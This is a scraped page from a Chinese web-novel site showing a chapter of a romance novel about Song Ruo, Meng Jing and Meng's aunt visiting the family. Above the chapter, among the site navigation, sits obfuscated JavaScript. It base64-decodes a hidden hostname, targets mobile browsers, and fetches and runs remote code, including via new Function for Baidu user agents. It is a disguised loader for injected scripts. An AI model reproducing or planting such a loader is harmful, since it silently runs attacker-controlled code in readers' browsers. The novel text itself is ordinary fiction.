98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(4)(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

这年头哪还分那么多啊,孙女儿和外孙女儿不都一样吗。小阿姨嗔怪地瞥了她爸一眼,又笑吟吟看回宋若身上,殷切问:怎么戴口罩啊,不舒服?

一点小感冒。宋若摇头,接着脑海里灵光一闪。

她猛然想起来了。

谢琼是孟璟的表姐,两人只相差一个月。

眼前这位谈笑自若的,是谢琼的母亲,名叫孟姗姗,是孟璟的小姑妈。

谢琼在原著小说里也是个苦逼的存在,明明极有资本,偏在一棵树上吊死,主动放弃了一整个世界的热带雨林。谢琼深深眷恋宋若,爱上了她白莲花一样柔弱的外表和作天作地的品格,只可惜宋若眼睛里只有孟璟,一而再、再而三地利用谢琼的感情。

孟璟那个真爱小娇妻,好像就是孟姗姗引进剧情的?

宋若脊背出了一背冷汗。

孟璟的小姑妈果然老辣,这一招釜底抽薪来得好生凶狠,直接断绝了原主的念想。

只可惜,谢琼依旧没能敲开宋若的心扉。

宋若捧着手里的奥赛资料,坐在那里怔怔地出神。

若若。孟姗姗喊她。

宋若啊?了一声,孟姗姗倾身过来,拿过她手里的资料一看,哗然道:哎哟,还学奥数哪,这么个伶俐孩子。

宋若讪讪接过书,辩解道:我就是学着玩儿,当不得真。

玄关那里一阵响,孟璟面无表情地开门进来,身上却穿着连体式泳装,头发仿佛是湿漉漉的。

宋若来不及细看,慌忙转过脸,假装在看窗外的风景。

孟家姑侄打过招呼以后,孟姗姗又旧事重提:爸爸,既然若若学习这么好,要不让谢琼也转学过来这边,接受接受熏陶,平时也好代替我承欢膝下啊。

谁知还不等孟爷爷有所表示,孟璟先说:别了吧。

第5章 不大对劲

为什么?孟姗姗女士脸上笑意不减,只是已没了方才的温存,半是调侃半是较真地揽过侄女儿的肩,这是你家,也是我家,我们谢琼怎么不能来,又不抢你地盘儿。

孟璟说:会打架。

宋若在一旁抿嘴,暗笑了下,这二世祖倒是实诚。书中说,孟璟是个占有欲极其强大的人,只要是她的东西,哪怕并不喜欢,也一定要牢牢握在自己手心,不容他人染指。幼时有人来做客,别的都有限,但要是动了她的书本玩具或是衣物,就会被她变着法儿折磨。谢琼偏又是那种忍辱负重的类型,常常在挨揍的当口被家长拦下来。总体来说,孟谢两位小姑娘,算是性格不合。处不来的。

孟璟这言简意赅的拒绝,却让孟姗姗很有些下不来台。

还是孟卫国从旁边打圆场:来来,吃水果。孟璟去把衣服换一下。小琼的学校我看挺好,最好的附中,和七中不分伯仲,突然转学,孩子反倒还要适应,耽误学习。寒暑假过来和妹妹们一起玩就是了。姗姗,你刚刚说到哪儿了?

孟姗姗被这么一打岔,注意力被扭转回去,又继续宋若回来之前父女俩的话题,爸爸不是老说头痛吗,让您去医院,您一拖再拖,讳疾忌医得很,这次谢琼她爸医院,有两个国际上闻名的德国脑科专家来会诊,我接您过去,做个简单的检查,顺道我也尽尽孝心,陪陪您。

孟卫国沉吟了下:那我准备一下,明早跟你走。

不用准备啦爸,就是个检查,准备什么?我那儿要什么没有?孟女士上去挽着父亲,一锤定音,我亲自开车,您有什么不放心呀。把个老人家撺掇得起了身。

孟卫国到底还是不放心,回头叮嘱两个站得笔直的孩子,不要担心我,我去去就回来。两个人要相亲相爱,互相帮助。

宋若答应了,孟璟只是点点头。

晚饭只有宋若和孟璟两个人坐在饭桌上。

宋若心情不由得微妙起来。

这个时间点,是原著小说里,宋若和孟璟第一个大的交锋回合。

孟爷爷去了隔壁市做检查,孤女寡女共处一室,两人又是未婚妻妻的关系,原主觉得这是个增进感情的大好时机。

于是原主借着贫血头晕,软软摔倒在地,还磕伤了胳膊。孟璟只是性格略微阴了些,本性并不坏,见她晕倒,当然过去搀扶,原主趁机要求她抱自己回房间,身为心机高手的她,在孟璟怀里几乎化成一朵温暖的糖果云,嘴唇若有似无地擦过孟璟的脖颈,耳廓整个过程暧昧旖旎不已。

宋若惊觉自己嗓子眼发紧,脸颊一阵阵的发凉,可见刚刚一定热烘烘的,赶忙起身,绕远路去倒了一杯热水,假装喝水。

为了给自己的脑子降温,她回想了下孟璟对原主的反应反手将人抛在床上,冷冷说:早点休息,明天帮你请假。

于是原主偷鸡不成蚀把米,赔了夫人又折兵,非但没能一举拿下三垒,反而连次日清早一起上学的机会也失去了。

宋若想笑,又觉得心里涩涩的,有唇亡齿寒之感。说实在的,看那一段的时候,她真实地感觉到了同名女配对孟璟的痴恋,有欲,更有情。

世间八苦,生老病死,怨憎会,爱别离,求不得。

正是因为有原主这个前车之鉴,她说什么也不要以身犯险。

孟璟挺郁闷的。

一顿饭快吃完了,便宜未婚妻仍旧没朝自己这边看过一眼。

她发现,这未婚妻不大对劲。一般的小姑娘都是扮靓,她却仿佛故意要扮丑。在家倒是没戴口罩了,可不知她打从哪里弄来的一副超大黑框眼镜,架在脸上,几乎遮了半张脸。还松松垮垮的老往下滑。

看着滑稽之余,有了点小学究的样子。

然而嘴唇红润润的。

拿筷子的手指纤细洁白。

一捏就碎的即视感。

捏疼了,她会不会哭?

孟璟惊觉脑海里的想法已经变得不成体统了,连忙打住,咳嗽一声,没事找事地指着一道柠檬鱼片,对厨房方向说:芬姨,这鱼太淡了。

芬姨闻讯出来,诶了一声:是嘛,我去加点盐。刚混忘了。

鱼加了盐,又端上来。

孟璟夹了一筷子,食不知味。

宋若安之若素地吃她的饭,全程安静,仿佛周遭发生的一切都跟她没关系。

孟家所在地段海拔较高,晚间在阳台能看见星海云河,皎皎银月,气温也适宜,纵然盛夏,只消把门窗洞开,就有源源不断的凉爽夜风过境,连空调也不用的。

这一楼大厅的风尤其怡人。

晚间两人各自洗完澡,都来到一楼纳凉。

宋若写完作业,就刷从图书馆借的奥数资料。

孟璟不知自己是否故意,开着很大的音量打游戏,两腿交叠搁在茶几上,偶尔往便宜未婚妻那边看一眼,并没有得到什么反馈,就连麻烦戴耳机这种要求,都不见她提。反倒是她自己,左一眼,右一眼,渐渐发现了件有趣的事情。

人在沉思的时候,会有各种小动作。据说天蝎座的人深思时,会不自觉皱眉。宋若面色很平静,可以假装无事发生的那种波澜不惊,但左手出卖了她。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间